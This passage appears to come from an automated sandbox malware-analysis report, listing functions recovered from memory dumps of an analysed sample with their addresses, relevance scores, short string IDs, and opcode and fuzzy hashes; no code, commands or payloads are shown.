              • Opcode ID: 5d66b9db274492aab5f4395de3208e8d456dc9b7394bba53b8e0cb7edbbecefe
              • Instruction ID: 72dbe82fd469599b38dc4fe3641dd46cdd3e5a758858d5bbe9da07d0484d1296
              • Opcode Fuzzy Hash: 5d66b9db274492aab5f4395de3208e8d456dc9b7394bba53b8e0cb7edbbecefe
              • Instruction Fuzzy Hash: BA51D4B0D0566D8FEB69DF64C8987E9B7B2FF49301F1041A9D40DA7291DB39AA85CF00
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF606E7 Relevance: 5.1, Strings: 4, Instructions: 88COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID: "$)$+$/
              • API String ID: 0-3570642953
              • Opcode ID: 9d47cc7c6f9f8f284273e54773ea8e5c4d859b6bd83d8c4631c5d020c2de061a
              • Instruction ID: fe10bb05411fdabc8bdf5e7c98271a27ee5aaa690f26e86c52f440d830f2e255
              • Opcode Fuzzy Hash: 9d47cc7c6f9f8f284273e54773ea8e5c4d859b6bd83d8c4631c5d020c2de061a
              • Instruction Fuzzy Hash: 0341C8B0D0626D8FDB69DF24C8987F9B7B1BF54305F1041AAD54DA7281CB399A88DF01
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF60A47 Relevance: 5.1, Strings: 4, Instructions: 83COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID: &$/$[${
              • API String ID: 0-2536217607
              • Opcode ID: 457a6003c20e08f06fb1bc7589a9ee0d80fbc19394496472fa401207ef97e16d
              • Instruction ID: 3bf119d81e1a423b4480eb26b36f3b148c1e196ae710c69030b95eb08fac6af4
              • Opcode Fuzzy Hash: 457a6003c20e08f06fb1bc7589a9ee0d80fbc19394496472fa401207ef97e16d
              • Instruction Fuzzy Hash: A431A5B0D0925A8BDB6DCF74D4987BDB7B2AB48315F10417ED40EA7281CB395984CF04
              Uniqueness

              Uniqueness Score: -1.00%

              Executed Functions

              Function 00007FFBACF3EE6E Relevance: 6.3, Strings: 5, Instructions: 73COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.441277535.00007FFBACF3E000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3E000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf3e000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID: !$3$A$]$k
              • API String ID: 0-237419272
              • Opcode ID: 4ed21f01810f28e839933c5dc948fa3bafa8f8c08764cc0de8ff81975f4ea77f
              • Instruction ID: a2562dd371ac6718599d3681c550b8856a093a80e6418307e7d9c770a9ac0ff6
              • Opcode Fuzzy Hash: 4ed21f01810f28e839933c5dc948fa3bafa8f8c08764cc0de8ff81975f4ea77f
              • Instruction Fuzzy Hash: 6231F8B0D0A62A8BDBA9DF24C8997E9B7B1EF54310F0041E9D55DA7381CB35AE84CF40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3EC8D Relevance: 6.3, Strings: 5, Instructions: 60COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.441277535.00007FFBACF3E000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3E000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf3e000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID: #$3$A$[$k
              • API String ID: 0-610135868
              • Opcode ID: 0166d72d2d2425c56ee383e5f9523df1833d9d6fed42b4a8471d3729c6deac92
              • Instruction ID: 92250d0c23ac8262f7813c9acc6c17bf683d6995c93b51f104a21ef7bd1cd09c
              • Opcode Fuzzy Hash: 0166d72d2d2425c56ee383e5f9523df1833d9d6fed42b4a8471d3729c6deac92
              • Instruction Fuzzy Hash: 9B21ECB0D0962D8BEB69DF25C8557E977B1BF54300F0041ADD81DA6381CB79AE84CF40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3C3AD Relevance: 1.4, Strings: 1, Instructions: 173COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.441130971.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf3a000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID: $K~
              • API String ID: 0-2883342327
              • Opcode ID: 9de682389cbf51f26719d87ce3778a86b5da02907fb7c664dafe38920de6a85d
              • Instruction ID: bb3718279078a3428a96e4b962511770c454d17d3d66c334a6b2c2db0e922f59
              • Opcode Fuzzy Hash: 9de682389cbf51f26719d87ce3778a86b5da02907fb7c664dafe38920de6a85d
              • Instruction Fuzzy Hash: E64185B7D1862A5AEB51BB7DF4050FE77D0DF81331F000637D698C9092DB25B48A9AE4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3C35D Relevance: 1.4, Strings: 1, Instructions: 154COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.441130971.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf3a000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID: $K~
              • API String ID: 0-2883342327
              • Opcode ID: 594943056593f0f9abb9387cc0282bb75712c1f5ae5dd63d05f735205797d572
              • Instruction ID: 1e284e2e2bd71ed353c02597b48371164e795ad4af7ed029813af4160fb44145
              • Opcode Fuzzy Hash: 594943056593f0f9abb9387cc0282bb75712c1f5ae5dd63d05f735205797d572
              • Instruction Fuzzy Hash: 4841B4B7D0862A56EB52BB7DF4050FA7BD0DF81331F000636D658C5092DF25B48A9AA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF42BF5 Relevance: .4, Instructions: 414COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 097681c86cf756af4035a85a0096d0f7f5e572e24e2c97221e5b77b490679a4b
              • Instruction ID: 881cf80ea470eb3dcb221e8738752e8b9e1e6205438c605404052aa5ef7c2a14
              • Opcode Fuzzy Hash: 097681c86cf756af4035a85a0096d0f7f5e572e24e2c97221e5b77b490679a4b
              • Instruction Fuzzy Hash: B8C1BBEBD0E1A50BE713A77DB8A51E97F90DF42331B4400B7D688CA097DE19D84E86A1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF42C83 Relevance: .3, Instructions: 341COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5c6aa8569b7101d6af6ae117a91ff348e6c4a5002fe35b046a10e562b6dc2960
              • Instruction ID: 4d769fa411a530119e457b2da7d759051cbb25c2c5595502b6915ec8b95fdb26
              • Opcode Fuzzy Hash: 5c6aa8569b7101d6af6ae117a91ff348e6c4a5002fe35b046a10e562b6dc2960
              • Instruction Fuzzy Hash: 6FA1DAEBD0E2A50BE713A77CB8A51E56F90DF41370B4400B7D688CA097EE19DD4E8291
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF42CAA Relevance: .3, Instructions: 316COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a9db88452dc820359416067452b3b0645b67072b44d6337852b48e4677c0a682
              • Instruction ID: 6100305be119c43a2148ac90cc8c0566dc2c7ef58cdecba487d24a204edaae05
              • Opcode Fuzzy Hash: a9db88452dc820359416067452b3b0645b67072b44d6337852b48e4677c0a682
              • Instruction Fuzzy Hash: 2D91DBEBD0E2A60FE753A77CB8A51E56F90DF41270B4400B7D588CA097EE19DD4E8391
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4468D Relevance: .3, Instructions: 268COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aa84066dbdb2e116c133e14cae3cc354562e97bc3e2a2d3bcea8ffd21f3a152a
              • Instruction ID: a50ce239682752594dd2da4d1f4a748606379854ec138badd0e9fbd64b76094c
              • Opcode Fuzzy Hash: aa84066dbdb2e116c133e14cae3cc354562e97bc3e2a2d3bcea8ffd21f3a152a
              • Instruction Fuzzy Hash: 4D9150B0909A5D8FDB95EB78C8996A97BF1FF59310F1001AAD40EE7292CE359845CB40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF42F95 Relevance: .2, Instructions: 220COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 284acc51ee5409f81d649b00d79d4e3c85e71be8e9471bef3710ad3bc1854dfe
              • Instruction ID: c59ff0b598b3be2f8f93f9dae1ea2dbce276e2c391608c4d18fc4a5d8bcfd0d2
              • Opcode Fuzzy Hash: 284acc51ee5409f81d649b00d79d4e3c85e71be8e9471bef3710ad3bc1854dfe
              • Instruction Fuzzy Hash: 3D91F8B0D19A1D8EEB95EF78C9987ACB6B1FF58300F1041B9D40DE3292DB359988CB10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3BCE9 Relevance: .2, Instructions: 215COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441130971.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf3a000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 32d79eb15db54fe3fcd8c8826b725e1533082f8200e1fd2c7bf2329258bd59e4
              • Instruction ID: 11cc3d2bf708ab2dba9f0407d200de842058b0b90a8fe5506215d2e7bcb21b1d
              • Opcode Fuzzy Hash: 32d79eb15db54fe3fcd8c8826b725e1533082f8200e1fd2c7bf2329258bd59e4
              • Instruction Fuzzy Hash: 2B7107B0D1951D9EEB95DBB8C4A86ECB7B1FF59300F5001BAD41DE3292DE35A8858B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3351F Relevance: .2, Instructions: 214COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.440791664.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf30000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ca43d9a482039594d725d57b95c4b0133951eae73786a3d7d19e875d0332d417
              • Instruction ID: ab136e22b02d582baad180d86630423ae83a65ec7f817a8ff0facd8f74a2f6b8
              • Opcode Fuzzy Hash: ca43d9a482039594d725d57b95c4b0133951eae73786a3d7d19e875d0332d417
              • Instruction Fuzzy Hash: BF71ADB1A1895D8FEB84EB6CD8157ECBBE1EF4A320F40017AC10ED3796DA691806CB45
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF308EF Relevance: .2, Instructions: 208COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.440791664.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf30000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6bc23121c0294c2be8ff3d1d901cdbce869084909c3a9f3b0ae71e4ce65a80c7
              • Instruction ID: b26f4965a83e100c78063574190b3fb80363d8abbc4e87c6907fadbdf919a376
              • Opcode Fuzzy Hash: 6bc23121c0294c2be8ff3d1d901cdbce869084909c3a9f3b0ae71e4ce65a80c7
              • Instruction Fuzzy Hash: D671B5B1D09A1D9FEB59EB34C489BE9B3A1FF54310F0041B6D41ED72A2CE35A84ACB40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF446A0 Relevance: .2, Instructions: 168COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 76ad1f94df06ed31cfb3390438c9e63d7ced72953a27193a5d84f14c27d69458
              • Instruction ID: 63cc0cd74c92fc119d80b538bd31185b360816a44d61e336245606573d6a8f19
              • Opcode Fuzzy Hash: 76ad1f94df06ed31cfb3390438c9e63d7ced72953a27193a5d84f14c27d69458
              • Instruction Fuzzy Hash: 9D512BB0D0995D8FEF94EB68C8997ADBBF1FF69310F50016AD40DE3291DE35A8858B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF32035 Relevance: .1, Instructions: 146COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.440791664.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf30000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2c2e55fc542fc84e03fe15ec6e542c52ca7c8e6ef9a889d1c40aac8370bcbf1c
              • Instruction ID: f50a509e7d2ef768a403631f43edcf0654aeed15efe2a015d9870a8717528ab0
              • Opcode Fuzzy Hash: 2c2e55fc542fc84e03fe15ec6e542c52ca7c8e6ef9a889d1c40aac8370bcbf1c
              • Instruction Fuzzy Hash: 364124F190D65A5FE746EB38D4491F87BE0EF45300F0501B6E82DC72A3DE29E8498341
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF318F4 Relevance: .1, Instructions: 138COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.440791664.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf30000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: af46e27fb9476c00cbb7315cb767367c7113da65fc65a68bd9af554f684d406d
              • Instruction ID: 05f1ee2c779854811f6c562637bda571aefcf823f6b3e210694ae43301f10a8f
              • Opcode Fuzzy Hash: af46e27fb9476c00cbb7315cb767367c7113da65fc65a68bd9af554f684d406d
              • Instruction Fuzzy Hash: CD41B270B187498FCB4DDE28C8954BA77E1FB98714B14857DD89AC3396CE35E812C781
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3C450 Relevance: .1, Instructions: 134COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441130971.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf3a000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a36aa3db3b69fb9b973ff76324ad221b34588ab294a726b065d0507d0e407836
              • Instruction ID: cc885b95372c2de196719ecda263e6c9277f2ecda86cac85e7cdce653136598f
              • Opcode Fuzzy Hash: a36aa3db3b69fb9b973ff76324ad221b34588ab294a726b065d0507d0e407836
              • Instruction Fuzzy Hash: FE41CAF6D0962A5AEB92BB7DE4080FD7BD0EF54321F000636D91DC5192DF26B48E96B0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF41E4D Relevance: .1, Instructions: 126COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 583e6bec501f2d4cf52417f5b56613bf4308d1e2969a88dc14515319edddcde2
              • Instruction ID: 40b969f909cbb5f51915c7224ba14c1e8d3afaba50953e30ed63a22a18a998e0
              • Opcode Fuzzy Hash: 583e6bec501f2d4cf52417f5b56613bf4308d1e2969a88dc14515319edddcde2
              • Instruction Fuzzy Hash: 9A414BB4D1962D8FEB45EBA8C899AEDB7F1FF58300F400179D509E3292CE396805CB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF330F5 Relevance: .1, Instructions: 117COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.440791664.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf30000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6af072370a412023077cb60296011acd1b213b7ba8b7eae7fabb91de8762b8f6
              • Instruction ID: 125f51eb5a8b1a3711bf8ffe13e5b7c636f091e9d5c91c1d104d58acc1b56507
              • Opcode Fuzzy Hash: 6af072370a412023077cb60296011acd1b213b7ba8b7eae7fabb91de8762b8f6
              • Instruction Fuzzy Hash: C2418EF0D0950A9BEB55EB78C4582FD77F0EF48300F011039D81992282CE3AE94E8B50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF30A4C Relevance: .1, Instructions: 117COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.440791664.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf30000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 70984410bf9511c4c550bb9f1208fc23b126f2a9a9be362e0a83eada8e05e9e3
              • Instruction ID: 1d069ebef5fe2bb6b0860ba3ec3a172d746e8c03087a473ec54361fb6c4e1825
              • Opcode Fuzzy Hash: 70984410bf9511c4c550bb9f1208fc23b126f2a9a9be362e0a83eada8e05e9e3
              • Instruction Fuzzy Hash: 9741D7B190490D9FDB49EB34C8897EDB7B2FF54310F5442B6C41AD72A6CE34A846CB40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3CE29 Relevance: .1, Instructions: 113COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441130971.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf3a000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fef1563a628790cc32822a3743fce09e82290db63456ef6150ded44e54ed80c5
              • Instruction ID: b447d87e218757c9f74d4bd71ef7d7ecf73da99440c6f92ddf4dc91971d55f25
              • Opcode Fuzzy Hash: fef1563a628790cc32822a3743fce09e82290db63456ef6150ded44e54ed80c5
              • Instruction Fuzzy Hash: 6E414AB0D0A6199FDB51DFB5C8486EDB7F0EF18311F104276E818E7282DB39A948DB60
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF322C7 Relevance: .1, Instructions: 94COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.440791664.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf30000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a32b3e0b368ed2f043c69e242d5b26d0150ac8c8116c2396d858f99cd914da46
              • Instruction ID: ef2d6f28cf46391597d720d452c237078c20b2be8cb28d5d819c173caa8c4510
              • Opcode Fuzzy Hash: a32b3e0b368ed2f043c69e242d5b26d0150ac8c8116c2396d858f99cd914da46
              • Instruction Fuzzy Hash: F0313FF1D0A51A9BEB65DB30DC487FCB3B1BF05300F5041B9C86D96392DE79A9488B04
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3C458 Relevance: .1, Instructions: 89COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441130971.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf3a000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f49b61ba35edaa5bfcc8e7c52dd2b96273e42fde19b4a2af0785f57e5f4db578
              • Instruction ID: 42f3670799c205a40c82fbbfcded8155c4560f190b4e4f7fe0dc43f31baa24b8
              • Opcode Fuzzy Hash: f49b61ba35edaa5bfcc8e7c52dd2b96273e42fde19b4a2af0785f57e5f4db578
              • Instruction Fuzzy Hash: 2221EAF6D0966B5AEB92BB7DE4080FE3BD0EF40320F000636D91CC5192DF25B48D96A4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF420D0 Relevance: .1, Instructions: 81COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1152ae809a4dfa78c7252e7bf4eb2bc3a52fc504ed4414f628ed3e075e1fac18
              • Instruction ID: 47e33c6ac8d107923f3e0be9e938d059ed492a3b270e65ed83e95d6b9ea1a9ca
              • Opcode Fuzzy Hash: 1152ae809a4dfa78c7252e7bf4eb2bc3a52fc504ed4414f628ed3e075e1fac18
              • Instruction Fuzzy Hash: 6721DEFAA0951D8BE751FB7CD98A1F97BA0EF85321F0504BBCA08C7052DA25E54A8790
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4239A Relevance: .1, Instructions: 81COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b8c6ef45a34945ef6e4549cde486bf03ad087c04fa943c60f5a2ddc2cddbc8a9
              • Instruction ID: 5002979ba6e299cc6a06d51626494ac9fdb32efe9d9c394f3edf2575b63b1565
              • Opcode Fuzzy Hash: b8c6ef45a34945ef6e4549cde486bf03ad087c04fa943c60f5a2ddc2cddbc8a9
              • Instruction Fuzzy Hash: 883182B4D1462D8FEB54EBA8C885BADB7B1BF59301F504179D50CE3292CA346989CB41
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF41930 Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 231f96e892407b2accb547d655471bce5c3584c1d8fae775a27747e763f72633
              • Instruction ID: fa062428aad86762b747d4f688cf0183a214b3d6b4a9f1b982bf6c7bfbd65511
              • Opcode Fuzzy Hash: 231f96e892407b2accb547d655471bce5c3584c1d8fae775a27747e763f72633
              • Instruction Fuzzy Hash: 5D2196B188E3C94FDB579B708C695E53FB09F17200F0940EFD48AC74A3D9695559C352
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3A0E1 Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441130971.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf3a000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4ae8102400916175b87556d3f84de9e2a6311a3d752cd3017ca1e1db53ec05a4
              • Instruction ID: 9feaa4c547310433195256117bd6ee29482a3852471b79050fe55059d557340d
              • Opcode Fuzzy Hash: 4ae8102400916175b87556d3f84de9e2a6311a3d752cd3017ca1e1db53ec05a4
              • Instruction Fuzzy Hash: B02181B0918A4D8FDB89EF68C4995ED3BF0FF68305F0101AAE819D7291DB35E445CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3AA90 Relevance: .1, Instructions: 68COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441130971.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf3a000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1dbc4fd3766f921512be00319818eff76541c03a0eb39bc74d4f7fe04560a6ea
              • Instruction ID: b3b268e7c83f8360287e5c6e6ce242dbbff688e369dfc57464d580fbbd742b78
              • Opcode Fuzzy Hash: 1dbc4fd3766f921512be00319818eff76541c03a0eb39bc74d4f7fe04560a6ea
              • Instruction Fuzzy Hash: 0021FDE190964E9EEB57EBB8C84C0FD3FE0EF45300F0401B7D828D61A2EE25A8488750
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF41BB1 Relevance: .1, Instructions: 67COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3866ea5e7d0c7469ed2355cc827e00d2b4a51bbf2d2bfbfdced76581a5440315
              • Instruction ID: 97aab76922bf6f5b0fb20602f16ba8f14fe87ef5ac5c4903b9d4e075d71d7ab3
              • Opcode Fuzzy Hash: 3866ea5e7d0c7469ed2355cc827e00d2b4a51bbf2d2bfbfdced76581a5440315
              • Instruction Fuzzy Hash: 581179B09596498FDB49DF28C8995E93BA1FF58304F0142BEE84AD3291EB35A494CB81
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF46331 Relevance: .1, Instructions: 66COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
